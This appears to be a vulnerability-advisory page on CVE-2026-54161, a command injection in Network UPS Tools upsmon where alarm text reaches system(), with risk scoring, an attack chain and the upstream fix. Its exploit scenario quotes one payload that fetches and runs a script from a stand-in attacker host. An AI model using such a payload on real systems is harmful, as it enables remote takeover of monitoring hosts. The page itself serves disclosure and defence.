Skip to main content

NUT upsmon CVE-2026-54161

CRITICAL
2026-07-01
Share

Severity by source

vuln.today AI
9.0 CRITICAL

AV:N for 3493/tcp network path; AC:H requires MitM or upsd compromise; PR:N needs no target auth; S:C since payload escapes upsmon process scope.

3.1 AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H
4.0 AV:N/AC:H/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Estimated by vuln.today — no official severity rating has been published for this CVE yet.

Lifecycle Timeline

1
Analysis Generated
Jul 01, 2026 - 20:21 vuln.today

Description PRE-NVD

Disclosed via oss-security. NVD scoring and full description are pending.

AnalysisAI

Remote OS command injection in Network UPS Tools upsmon (versions 2.8.3-2.8.5) allows a network-positioned attacker - acting as a man-in-the-middle on the plaintext 3493/tcp NUT protocol connection, operating a compromised upsd server, or controlling a rogue UPS device - to execute arbitrary shell commands as the upsmon service account. The vulnerability exists in the NOTIFYCMD alarm handler, where server-supplied ups.alarm text is interpolated directly into a shell command string and executed via system(), enabling injection of shell metacharacters. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Gain MitM on 3493/tcp or compromise upsd
Delivery
Inject shell metacharacters into ups.alarm field
Exploit
upsmon receives ALARM event with attacker-controlled alarm text
Execution
snprintf() builds tainted shell command string
Persist
system() passes string to /bin/sh
Impact
Arbitrary OS commands execute as nut service account

Vulnerability AssessmentAI

Exploitation Exploitation requires two simultaneous conditions on the target: upsmon.conf must have NOTIFYCMD set to any external command, AND NOTIFYFLAG ALARM must include the EXEC flag - the reporter describes this combination as a common operational configuration. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment Real-world risk is moderate-to-significant in environments where upsmon is deployed with NOTIFYCMD and EXEC-flagged ALARM notifications, which the advisory characterizes as a common operational pattern. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker with access to the network segment carrying unencrypted NUT protocol traffic spoofs or intercepts the upsd response to a upsmon poll, injecting a crafted ups.alarm value such as 'Battery low$(curl http://attacker.example/implant.sh|sh)' into the ALARM notification. When upsmon receives the event and has NOTIFYFLAG ALARM EXEC configured, it constructs a shell command string by interpolating the alarm text via snprintf() and passes it to system(), causing the subshell expression to execute as the nut service account. …
Remediation The upstream fix is available as GitHub PR #3499 (https://github.com/networkupstools/nut/pull/3499), which eliminates the vulnerable system() call by replacing it with execvp() on POSIX and _spawnvp() on Windows, passing the NOTIFYCMD and alarm text as an argv array so shell interpretation never occurs. … Detailed patch versions, workarounds, and compensating controls in full report.

Recommended ActionAI

Within 24 hours: Inventory all systems running Network UPS Tools upsmon versions 2.8.3 through 2.8.5 and classify by criticality. …

Sign in for detailed remediation steps and compensating controls.

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

CVE-2026-54161 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy